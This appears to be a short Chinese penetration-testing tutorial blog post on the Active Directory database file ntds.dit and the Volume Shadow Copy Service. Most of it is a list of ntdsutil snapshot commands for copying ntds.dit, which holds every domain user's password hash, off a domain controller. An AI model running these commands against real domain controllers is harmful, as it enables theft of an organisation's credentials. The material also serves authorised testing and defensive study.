本文已参与「新人创作礼」活动,一起开启掘金创作之路。
活动目录数据库(AD)
ntds.dit:活动目录数据库,包括有关域用户,组和组成员身份的信息,他还包括域中所有用户的密码哈希值 使用存储再SYSTEM注册表配置单元的密钥对哈希进行加密。如果破解sam文件与ntds.dit文件都需要有一个system文件\
AD DS数据存储
由ntds.dit文件构成
默认存储在所有域控制器上的%systemroot%\NTDS文件夹中
只能通过域控制器进程和协议访问
由于windows阻止对这些文件的标准读取或复制操作,因此必须使用特殊技术来获取副本
Volume shadow copy service
卷影副本,就是快照。存储在Data protection manager(DPM)服务器上的副本的时间点副本,副本是文件服务器上单个卷的受保护共享,文件夹和文件的完整时间点副本(类似于某个文件夹或者盘在某个时间点的镜像备份,但也有区别)。 volume shadow copy service (vss)卷影复制服务是微软从windows XP开始提供的用于创建一致性的时间点副本(也就是快照)的服务框架
用户数据备份
支持windows server 2003 及以上操作系统
系统默认在特定条件下自动创建数据备份,如补丁安装后,在win7系统大概每隔一周自动创建备份,该时间无法确定。
禁用VSS会影响系统正常使用,如System Restore和windows server backup
作为渗透攻击的一方,我们可以用vss来备份记录域控机器的ntds.dit文件。
拿到授权之后,利用工具,通过vss服务以及其他方式来获得ntds.dit文件.
获取ntds.dit
ntdsutil
交互式获取 ntdsutil
snapshot
activate instance ntds
create
mount [GUID]
unmout [GUID] //copy 完之后再执行卸载
del [GUID]
quit
quit
• 非交互
- 查询当前系统的快照
ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit
- 创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
3. 挂载快照
ntdsutil snapshot “mount {b22b5b27-f20c-452f-bfc4-5ad2d513e765}”quit quit
- 复制ntds.dit
copy C:$SNAP_202101201336_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
- 卸载快照
ntdsutil snapshot "unmount {b22b5b27-f20c-452f-bfc4-5ad2d513e765}" quit quit
- 删除快照
ntdsutil snapshot "delete {b22b5b27-f20c-452f-bfc4-5ad2d513e765}" quit quit
